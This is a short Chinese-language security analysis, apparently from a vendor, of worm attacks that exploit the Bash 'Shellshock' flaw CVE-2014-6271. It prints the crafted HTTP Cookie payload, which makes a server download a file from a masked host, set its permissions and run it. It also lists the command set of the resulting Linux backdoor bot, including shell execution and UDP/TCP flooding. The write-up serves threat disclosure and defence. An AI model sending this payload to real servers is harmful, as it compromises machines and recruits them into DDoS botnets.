【文章摘要】最近,BASH爆出一个远程代码执行漏洞:CVE-2014-6271。目前已发现利用这个漏洞的蠕虫木马,黑客通过利用bash漏洞攻击有漏洞的服务器,远程执行恶意代码指令,下载然后执行后门程序。
最近,BASH爆出 一个远程代码执行漏洞:CVE-2014-6271。目前已发现利用这个漏洞的蠕虫木马,黑客通过利用bash漏洞攻击有漏洞的服务器,远程执行恶意代码 指令,下载然后执行后门程序。 目前,腾讯电脑管家等Windows安全产品已经发现并查杀恶意利用“破壳”漏洞的木马。
向服务器发送恶意构造的HTTP请求
Cookie, ().{.:;.};.wget /tmp/besh https://x.x.x.x/nginx; chmod.777 /tmp/besh; /tmp/besh;
由于bash漏洞,造成服务器执行如下指令
wget /tmp/besh https://x.x.x.x/nginx; chmod.777 /tmp/besh; /tmp/besh;
攻击流程示意图
PAYLOAD : Linux backdoor 分析
该文件是一个linux的后门BOT程序,会连接远程C&C Server 接收命令,执行sh指令,进行DDos攻击等。
控制命令列表:
! PING-PONG:类似心跳的请求响应
! GETLOCALIP:获取本地IP
! SH: 执行sh命令
! SCANNER ON | OFF:扫描启动,关闭
! HOLD:HOLD Flooding
! JUNK: JUNK Flooding
! UDP: UDP Flooding
! TCP: TCP Flooding
! KILLATTK: 结束攻击任务
! LOLNOGTFO:结束后门程序